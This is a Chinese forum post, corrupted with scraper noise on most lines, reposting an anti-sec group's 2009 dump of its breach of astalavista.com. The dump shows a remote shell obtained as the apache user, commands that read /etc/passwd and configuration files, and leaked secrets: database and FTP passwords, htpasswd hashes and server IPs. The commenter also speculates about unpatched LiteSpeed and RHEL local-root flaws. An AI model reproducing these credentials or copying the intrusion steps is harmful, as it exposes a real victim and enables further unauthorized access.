里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
" c$ U d) p' }7 E' q p
, W9 z7 g# T4 o[root@front3 ~]# curl -I litespeedtech.com
6 s) Z0 W2 y! A- B, O6 d% c8 iHTTP/1.1 200 OK
' E2 k* T, e6 ]0 P4 o! oDate: Fri, 05 Jun 2009 22:54:51 GMT
/ a) D5 x; ^: b6 xServer: LiteSpeed
# G2 g$ w- N; ^7 v$ D$ y1 c
! k. C1 l# N* |+ g$ R另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-4 i' n5 y$ t4 X, S, Q: E0 g7 R
4 B2 z7 J' N$ @: @4 H0 P
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
( t. e( x( e# P! A4 ^
2 B Y- e. B- k& ~, p8 ?1 X3 k8 f T- z( \+ `; Y
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 2 b# F: g V5 x& c9 _: ?
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
; Z% o V5 n- C/ q/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
. t" V5 @. N$ w2 F3 Q8 _; U- p4 x\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
+ |5 i& k( I/ t \/ \/ \/ \/ \/ \/ \/9 {% K! J Z0 j6 t" K; v
The Hacking & Security Community+ H) h2 z7 m6 \% E' _2 R. N# E' z
[+] Founded in 1997 by a hacker computer enthusiast8 Z+ v; T+ |8 U9 H$ Z& A4 i+ K' y
[-] Exposed in 2009 by anti-sec group* f7 F4 a7 I! ]) }. p& p4 T' C6 y
2 Q" P) o, g% F: h
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
% x5 h8 r+ R f% R$ s>> 03. Who’s behind the site?
# k6 H( ^ i! R>>& R8 s2 b/ U) N2 Y; W
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
3 o: q- d' |6 ~3 F6 e2 O6 h
6 r1 c/ H1 ?4 E- `>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
) t; |$ T0 y! F: `>>
- \/ p/ c3 m, E% E>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
- q$ q4 y* j/ A( |military institutions.
0 [2 M8 Y. o* W>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.- o) q/ @7 P( w3 E& y
/ `: b. \! ?" E% {# rWhy has Astalavista been targeted?3 ^8 ~# a7 T: s/ Z ]
8 e% m& W: }/ v5 r0 YOther than the fact that they are not doing any of this for the “community” but' S5 [9 `2 H1 s9 Q+ q2 `
for the money, they spread exploits for kids, claim to be a security community% E* U, J+ @/ w. y' I8 U) p! l
(with no real sense of security on their own servers), and they charge you $6.66
( _! _" ]4 ]/ s& ~7 C# G: Bper months to access a dead forum with a directory filled with public releases
1 `9 n7 V1 d( nand outdated / broken services.8 L0 ?: u% c B
6 E U+ g; g x) l2 W! n/ E
We wanted to see how good that “team of security and IT professionals” really is.& G" Z$ ~9 v% ~. H" N! o
e3 U- }1 Y3 T( P: A" oLet’s begin.3 N2 E* j% `' R! C3 W; Y) k" B
, M' C6 c$ C6 t" B3 u. @
anti-sec:~# ./g0tshell astalavista.com -p 805 B/ P4 ]2 n- O9 w; t8 a5 b o6 U
[+] Connecting to astalavista.com:80; {! `" I2 N& o) Y
[+] Grabbing banner…: a" U T6 j2 Z! q5 a
LiteSpeed& M0 O, N) y {. O8 a( o8 L
[+] Injecting shellcode…
) u- ^' ]+ u6 u8 ][-] Wait for it' n* ]% p6 b$ u& h% q2 A
$ u: V# j5 w. r- b[~] We g0tshell! C2 @2 J: ]9 ^6 g+ U; v! Y, _( h
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
8 k" |7 i$ b& h+ I2 Q* a7 \- vID: uid=100(apache) gid=500(apache) groups=500(apache), ~4 x+ D0 n% x4 \7 B
0 E; _7 h5 X5 p2 {: O* t0 K
sh-3.2$ cat /etc/passwd
/ a9 e" C) i$ T' o0 ?$ N/ Iroot:x:0:0:root:/root:/bin/bash
0 b. T q8 I: y: L" Dbin:x:1:1:bin:/bin:/sbin/nologin( h+ f4 L4 k1 z8 T/ t
daemon:x:2:2:daemon:/sbin:/sbin/nologin! n; q0 I6 c" A
adm:x:3:4:adm:/var/adm:/sbin/nologin0 t: p" |9 K+ {; G! ^
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
S T7 s( q a* Wsync:x:5:0:sync:/sbin:/bin/sync! @ \4 l- Z5 C W/ E
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
0 s4 H' A* d" }2 b) F7 C) Q' Chalt:x:7:0:halt:/sbin:/sbin/halt. ]* o* k$ R0 X" e6 k" m
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
& o- V5 h' W+ K$ K# s& ]$ Mnews:x:9:13:news:/etc/news:. y, z- H& P' Z2 K( g( q. q
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin. G$ R% c0 c5 C
operator:x:11:0 perator:/root:/sbin/nologin* Y9 S/ _4 J: A" L4 A
games:x:12:100:games:/usr/games:/sbin/nologin, E' G/ V9 T j5 V$ }! n& D
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin2 U& b; V# @2 n2 J
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin% d. ?) b9 n; @7 t. u1 J" ?" Z
nobody:x:99:99:Nobody:/:/sbin/nologin
- x/ D# f) L$ w/ wrpm:x:37:37::/var/lib/rpm:/sbin/nologin: z# z. f1 R2 N ~2 O0 P" o$ O: Y% F
dbus:x:81:81:System message bus:/:/sbin/nologin
4 w2 V5 ^% K# m' F* }& vnscd:x:28:28:NSCD Daemon:/:/sbin/nologin2 t" {- M8 z( c/ z6 g I3 S
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin6 d" f# R6 b% ]2 v- o/ ?
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
0 T2 o; C+ v0 fvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin/ ]& x2 v$ ~3 T/ c O6 t
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin! P1 }' {4 y) q& P8 q4 v2 L0 p \
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin" ]; @# B+ ~" @
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
1 B: o1 ]+ [& ^+ anfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
8 A; L! e6 K; V& Q0 G7 jsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin2 Y$ T% j& s Z/ s7 j- E7 c
pcap:x:77:77::/var/arpwatch:/sbin/nologin
/ p& D4 [( S* G i5 ~named:x:25:25:Named:/var/named:/sbin/nologin
7 N5 p, B4 @& U/ ? ?, uapache:x:100:500::/var/www:/bin/false- Q# w7 D# [! d- X
diradmin:x:101:101::/usr/local/directadmin:/bin/bash$ z: ?& L% Y+ W5 m
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
2 K. X, d, J% T* N1 y/ _webapps:x:500:501::/var/www/html:/bin/bash
7 P+ U- N0 M3 z/ T9 K$ ?. }6 v) Smajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash. j! R8 f* B3 `$ ^& @5 S
admin:x:501:502::/home/admin:/bin/bash- F8 B8 E" c2 b6 j
jon:x:502:503::/home/jon:/bin/bash, M& p V. D1 {. q4 G
com:x:503:504::/home/com:/bin/bash8 \/ M' _3 Q- ^3 z. h) e- {
ntp:x:38:38::/etc/ntp:/sbin/nologin
8 b) T, i, b$ eais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
) z2 P6 P: }% `6 K# i8 \astanet:x:504:505::/home/astanet:/bin/bash$ A7 o/ p% d+ I0 r% Y% f$ n) O
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
, g0 c8 r2 _9 g8 a8 @/ H; u/ j3 yavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
5 C. h- q% @ G# {7 x$ Y/ j/ D. s5 N2 q% X' R# t# F
sh-3.2$ cat /etc/hosts
. I, Z" ~7 S8 t7 ^9 m7 J7 P% g6 t# Do not remove the following line, or various programs
2 ^" X" I; E4 N- s ~) Z+ B6 v# that require network functionality will fail.2 T( X5 t5 ~" w2 T% k7 i
127.0.0.1 localhost.localdomain localhost
- E0 O. g" [4 a2 B! f::1 localhost6.localdomain6 localhost68 ^$ C- T/ X' x3 p; f+ A% e9 r
80.74.154.172 asta1.astalavistaserver.com8 g r# t: ]* c$ |* B
9 I) w8 I7 _' D3 ?% m+ n9 rsh-3.2$ pwd3 M3 \' I$ ^: M7 v% d% B' j
/home/com/public_html
+ m) W9 y3 l& {& P" r2 `/ Y1 R4 t1 i1 T; d$ I j$ I
sh-3.2$ ls -la
: ]9 O9 q6 v( c& `- ^total 18460* q) H" ]6 O, H6 m
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
* }3 a' ]% k, udrwx–x–x 11 com com 4096 Jun 25 2008 ..
! h4 o1 N4 m+ U) cdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
5 v7 ]* g: @. G, ]0 p+ f2 Fdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache2 `, i$ @1 I) c# _2 ?- n
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
! {& T1 m$ D7 O( x) N* X/ f* fdrwxrwxrwx 2 com com 4096 May 19 00:50 config, W" b- s4 E+ S* f N; `
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
3 Y) [1 `- C- |drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
8 z4 G6 W4 ~. l! F5 l0 wdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing& m+ ]7 ~' c( \% N
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo) D& d f) C1 P8 f4 h8 ?: Q' c
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
* G6 Y, k, ^% D9 o0 w! e6 O-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ \: Y7 @4 K Z% v8 X5 H6 {$ ]8 t3 z' ndrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
. d1 _+ W2 e3 c/ n8 U3 y; O5 s& ]7 adrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor( h2 J/ h! a+ G
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
# C9 K/ v, ]% l6 Rdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed |! ^& `, _; M/ y' Z; L3 q6 J
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
! ?7 o1 b6 u* @ O-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak$ f! K. j- m! F+ ^" Y8 g2 B4 t
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak3 M7 T( c4 U4 m# {. s
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool/ e6 O- r% [ w) z
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images2 b! a4 x+ K! h9 A3 D0 K
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php# u8 v) J% ~+ R/ l
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
" P5 D5 {8 d+ K, E4 n; Zdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang4 G* T* p# A0 _- Z8 `- S- C
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
" w7 R: n W& n# _9 Odrwxrwxrwx 12 com com 4096 Jun 2 07:47 media. D0 O) I, J* J t5 I7 G, ]/ g3 R
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications' V2 [( ~% z6 {
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
% ?8 R" e" }7 b2 y& |# h" v$ G0 x+ Pdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
9 A1 x7 c6 B8 ~( Tdrwxrwxr-x 22 com com 4096 May 28 17:06 _new0 S* O# f' B. A/ F3 N
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
) A, N P8 y- i. Bdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy0 s5 J/ O% h/ p9 o, E5 u4 R- q
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy3 e$ a& @! { i1 j$ i$ ~
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt7 A8 u# I* \1 _: z1 L9 h
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml- R$ m( P- Y$ L2 T$ c( C' J
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php* q7 u0 Q3 j; U: o
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
# J, h4 G: |+ N# Rdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp8 p' {; Y [8 F: f: I. i
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam$ Q: G# t. D* U2 o: [5 R- x& J. R
3 t$ U( z( B6 V2 b6 @. @
sh-3.2$ head -20 index.php3 b4 D" o) t0 W
<?php
" Y- g3 v# m8 b2 e% S. z) S, `0 M; x: ]5 K3 a- a
/**
4 W3 y$ ~. r7 ]' c* The main page for the CMS
+ X. v, t$ r" v* R* @copyright CONTREXX CMS - COMVATION AG
* u. Q2 f) Q" J0 l7 _4 Q1 [* @author Comvation Development Team- N. U: D3 x2 S; H# i& j6 B5 T
* @version v1.0.9.10.1 stable
/ ]; f, q1 _+ K3 b# y; j3 \% Z* @package contrexx- U9 U' J# I7 \5 y5 j1 |) P6 v
* @subpackage core! y' J) T( P' i, Z F; b, m/ M
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
[! y& O! s4 u+ u0 P* @since v0.0.0.0
6 ]% W c* Q# v# A* r* @todo Capitalize all class names in project6 C! X7 d: D* R# b( n0 v- ]
* @uses /config/configuration.php
4 f$ V9 W: [4 P- I9 a3 c$ V* @uses /config/settings.php1 D' i, l5 o2 y
* @uses /config/version.php5 a8 p+ s: h& Z- \5 \( B2 w9 s
* @uses /core/API.php! y3 o8 r6 T+ g7 D5 ^1 W5 _
* @uses /core_modules/cache/index.class.php. F' _1 e: |" m% k4 }
* @uses /core/error.class.php' b5 t0 m4 i; A) i9 G) T
* @uses /core_modules/banner/index.class.php1 F/ z* a2 w5 s: m1 | k: P
* @uses /core_modules/contact/index.class.php
2 d0 f+ n6 X9 ^: D, E2 c/ i1 q* N/ s
sh-3.2$ cd config/: W0 k# J! d$ v( l1 u
sh-3.2$ ls -la
; @1 k5 F" G6 s) {6 n* Vtotal 322 I/ g! x; u" e2 Y; r
drwxrwxrwx 2 com com 4096 May 19 00:50 .
/ ], w: Q6 r4 C" ?2 `% I! ~drwxr-xr-x 30 com apache 4096 May 28 17:06 ..& Y' p8 M, i3 [$ f: i3 c9 W% k8 }
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php& U0 A: \# e$ W' @' J; ~
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
. s$ X: O) l( G" Q- q- p. d-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
+ A- o) B% n- c. g, H-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
5 D& j! i3 G# F+ w/ F" s! Q$ J6 t, q% ~2 t( n9 k4 I3 Y2 Q
sh-3.2$ cat configuration.php7 O9 O# `0 Z& I5 g. C, o9 Y% P
[snip]) z% o& Z$ |% t6 D5 [6 t
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
0 e ]$ _2 z; i8 Z1 a' P3 Z/ v; X$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
; ^( Y, `* ?9 T9 F5 `* a+ S$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' }9 I6 h5 I9 l& P
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username! d6 d b; G& i# Q
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
' w% L1 }+ z$ f: ~$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)6 j m) A6 D- Y8 p
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..), V! _4 C/ P% H% |
[snip]
& U9 {1 H4 f. Q2 V$ Z7 H k5 _$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
m) |4 B! J4 S2 x5 M' B, L9 g6 N6 p+ x$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
4 n: r" L. }' r, ]. f: y& U2 a$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
2 v! ?6 P9 d% {0 V5 p/ l$_FTPCONFIG['port'] = 21; // Ftp remote port. K+ g! i' z3 V' H/ E+ J+ a
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
; o5 F6 t# r- ~, g7 s A$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
& Y" l# U& D$ q+ |$ n$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
$ s) Y3 i, V) @' h" Z: l% u3 J; F" y0 C" a
sh-3.2$ cd ..9 K4 y L+ Y# Y: ]2 I! @# i
sh-3.2$ cd dvd/" _; r% w4 r5 d8 f: t( @* D% H
sh-3.2$ ls -la
( V* `. Y' W/ ~total 2913780
) j$ t( ?, h% m* H( ydrwxr-xr-x 2 com com 4096 Sep 9 2008 .
" z- R0 N8 ]7 l$ Wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..9 T8 L! G' W9 \* f; @7 C- x l" y
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
/ c1 p) { v1 a% o4 K8 [, R-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
1 M* ?8 J4 ?8 ?: H, v' W- P: P$ N-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
# H9 D3 e4 `" H: l7 X- X-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
. ?( {. ?9 [0 ?6 L
$ |! F) l3 o( q, v9 Wsh-3.2$ cat .htaccess
" _$ v0 `! l- NauthType Basic. p% Z# P) E4 @# |& [' S
authName DVD
# p, A- q+ D1 i& g3 f9 `authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
* X& p. r2 [8 B: L2 yrequire valid-user; R& ~. B) v+ U
1 T U9 [3 m3 }" Q" I- ]: G. s
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
) }4 C |, z. g! I# ^; ODVDdownload:CRD8cuY6.MPT6
! ?, _% \. F- ODVDdownload2:CR8a36.wluFMg8 M' A) l7 x' X U3 K2 w' Y
0 T1 G( H* y) b1 o9 ~; i
sh-3.2$ cat test.php
/ [" p' R8 G- I, U) q. u<?php
2 M6 F& G/ d$ m5 W, h# z$ _$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;8 F2 i6 [* U! e, z9 G; i
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));/ W4 I" G# c! [8 x: e' P
echo $url;
7 V+ ^: V2 r- f# H3 @% o/ F8 ^?>
/ A) O0 F4 H4 E
' x: Q! n' u, D% x5 _5 E1 Psh-3.2$ cd modifications/5 p0 ]* [/ D8 x9 i4 Q+ J% q/ n
sh-3.2$ ls -la, Q) M! k9 Y: u2 M( m$ N- i
total 32
4 M8 T- K6 g* x' |9 ?; Ydrwxr-xr-x 8 com com 4096 May 11 12:48 .2 _/ }* W5 c" P; J: m5 G) T
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..5 ?& y" C7 m" y' T: k9 V! i( G* J
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
. ]2 h5 W# p0 P& a) R) q1 idrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
1 \! j6 r; a" T3 @drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools9 i* a2 v$ y! Y( V% {
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc0 V$ e0 Y# c" z) b ~6 `. O9 p
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
$ B. w, Q" @% {+ w0 \; n! b( ~drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp6 j2 `4 D( S5 T( @2 d: ^2 k6 e
( f+ f. w. a6 Ish-3.2$ ls -R$ w$ c( T& H9 f- Z. J4 {7 b
.:
# n- `: k4 F0 p; Z+ b$ n- [com_avtng cronjobs onlinetools pjirc search _tmp
' d+ B/ v# }) I* q: J" C3 I5 ?' g! a' C8 a# L
./com_avtng:
/ c3 U$ z6 u- y4 [0 ~) C" Lavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
" x& N# }: X5 o: I& T# L6 d% L8 l6 g8 n4 ^- P( G/ Q' ^
./com_avtng/scripts:
7 ~( [& J8 y2 | p4 W" p) Ppopunder.js$ _, F' C3 K# j; a& j
% e& O5 D: l; J- w* F; t
./cronjobs:8 P+ ?6 z B# Z' O8 L5 w( I* _
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
: L( j+ M& k6 ~ T" T4 U4 U) p% F9 A/ d' I
./cronjobs/tmp:! w2 `' _4 {1 P+ i! \
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv6 s9 `+ U. V* }' }, H
* k0 ?+ H, A1 p! T/ H+ f( d5 {./onlinetools: c% Q* o7 ^/ z! ^9 M8 R7 m
index.php6 T3 S6 ]1 @1 }/ ~' _9 @ a9 e, @3 R
" N$ L1 Q+ ^; M+ q./pjirc:' p( X4 P: a8 ~2 z7 q
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt! ? u' t" ?0 L) ?3 W3 _
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
% t4 Q& N- i- |( Jbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd' x; |: \ ^ r
- l0 f& g' }6 E2 ^./pjirc/img:* J2 J/ W9 H, U
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif$ z8 J) f Z0 u p) R' Q
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif & D8 [# g, o0 D% i4 k6 o6 g
verre-eau.gif/ K+ N' P9 ^8 v" F; f; G5 E
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
) V. r1 ~3 I8 nverre-vin.gif
% }9 [# e7 y. f# c" xballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
- [+ ]0 K7 q9 q% e" \biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif/ g2 i8 w* h4 K
/ f) X. \: m+ Y. V8 M7 a
./pjirc/snd: G M |5 p# t4 N: L
bell2.au ding.au/ @, C9 y: _0 C
- A/ y) A' W2 [& t6 O/ q./search:
. c0 O- T. C2 T1 Z4 i' t4 x: ]searchEngines.php search.php
: A/ a% j3 w' O0 r$ E5 g5 K2 X, c2 D- |' q
./_tmp:3 B" `2 ~. O. ?6 G4 m9 X& J3 S, ~
defaultPorts.php defaultPorts.txt
" l' @ z) y$ x- j6 t: |( C) r
$ h9 E& L O+ w, Ksh-3.2$ cd cronjobs/
2 V+ B- C+ ^- j& Z. E7 h* @sh-3.2$ cat exploits.php
4 j2 e# T2 `. J a& \4 |) Z$ Z[snip]
8 S. C5 r# h5 _3 b$categories = array();' E' y$ M& d! B( ^0 O- h) |
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
+ S; z+ j* M4 B1 a7 h- e$expolits = file($milw0rmFile);/ C6 Q2 M: n0 P L
$comExploits = array();" b8 j. A' B( t; A$ x
[snip]
7 V0 t# u/ p. @& B+ U* A// manage data* ?% P1 t5 f, D0 W# k$ s
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640* d' Y9 p" p- {3 ] D. A2 V, r; |
% d& N. k: b. f a3 i
// get path and title
0 A% d( t+ O' i" ~/ [ $expolits[$x] = trim($expolits[$x]); L; l( W1 Z, P9 }
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));* t0 r) s7 I0 C
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);4 E4 P$ k7 u5 D. N2 t" K
( B2 @; Y$ F9 O: J8 q2 m+ J // check if file exists
: N) z- C8 e: u" o' T e% z if (file_exists($path)) {( d4 Q ], }' C
. q: B* y* f0 A- |3 u1 d
$text = file_get_contents($path);( D9 N: r- G/ \9 y4 q! h/ H R
8 x6 e) Z- q$ C: z R
// get content and date
/ C4 @" ~; k+ ?! l$ E+ J& b, V8 ~ //$text = htmlspecialchars($text, ENT_QUOTES);6 @5 t4 A' g P* i
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
2 r, t" J, @, {9 Z+ l+ w% Q if ($tmptext != ”) {
/ l" V& c, l' g" N $text = $tmptext;4 ^7 b$ g" X2 s! G0 J5 g5 w1 e
} else {+ o8 E$ a% ?; p6 q6 _! `
$text = addslashes(htmlentities($text, ENT_QUOTES));
) X$ s7 e; G) W6 [0 [9 s. O }: O4 S) q& g/ W/ e
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));) i& ~! z1 y% X( P( k! l2 e8 j
$tmp = explode('-', $date);3 |8 y& c4 }& `+ A) B
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
; L. H) G! [ t $cat = getCategory ($path);
4 e/ q) V* M* c8 Q+ L0 @ $ext = pathinfo(basename($path));6 D% h& c0 z5 U/ I/ \" B
$ext = $ext['extension'];
$ M5 l: y) D) J6 k! U, R, |4 q $qStr = ”' \& y( y6 R( x1 V4 n5 H% {, I- q
SELECT `id`2 P6 u0 T+ V# B& b7 L1 i
FROM `contrexx_module_exploits`6 P2 J. {# s4 R) E3 L/ W3 g+ r
WHERE `title` = ‘” . $title . “‘
6 I3 K! c0 I# [& R5 a" z2 U2 i4 [ AND `date` = ‘” . $date . “‘/ ^% P% d, L+ `1 g2 i! k9 S
“;1 M: ]+ p! v+ ?8 T+ v
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;( k2 m% s* l3 O1 L; y1 L3 t1 I8 k
$q = $_objDB->query($qStr);
7 r' g7 o& w* `0 [6 d
( P* ~5 k( o* V/ s% } if ($q->numRows() == 0) {
1 b) {9 n# z! r4 G: y E5 \2 z0 A ]+ o
// prepare array/ V; F# m1 P% k4 s$ w
$comExploits[$x]['date'] = $date;
& L7 ^3 h% g* s I9 Q" e2 h $comExploits[$x]['title'] = $title;
, b" g t; B4 V1 a+ {9 b0 L6 v0 L $comExploits[$x]['author'] = ‘milw0rm’;9 q0 e: z9 z8 B% M8 O) U' I. b
$comExploits[$x]['text'] = $text;3 G+ l3 R6 W( Y
$comExploits[$x]['source'] = $ext;
. `& I& M3 t9 l* {- a! s ?- b6 v $comExploits[$x]['url1'] = ”;
% |5 T7 R4 D1 V( s+ V" U5 ~ $comExploits[$x]['url2'] = ”;& t$ s2 Y, z) L, `' e' C' \2 O0 o6 `% x
$comExploits[$x]['catid'] = $cat;
1 Q" ?+ Z# p; C/ J $comExploits[$x]['lang'] = ‘2′;5 l/ w" K1 ?4 B' ~0 |. l# d
$comExploits[$x]['userid'] = ‘12′;; z5 _! Z- G) @2 {
$comExploits[$x]['startdate'] = ‘0000-00-00′;
9 a) m) Y% S6 d+ v: y6 y $comExploits[$x]['enddate'] = ‘0000-00-00′;- m% q2 l1 [# D3 V2 P) f
$comExploits[$x]['status'] = ‘1′;5 U* W+ g7 l& ^' r: h# @! E1 ^3 m
$comExploits[$x]['changelog'] = $date;
9 l9 z% I6 K9 D; X. `4 w9 X$ B' T% L9 o
* c" A5 `0 e4 k- F% N6 G7 { }8 M) I2 I' d4 H- G
[snip]
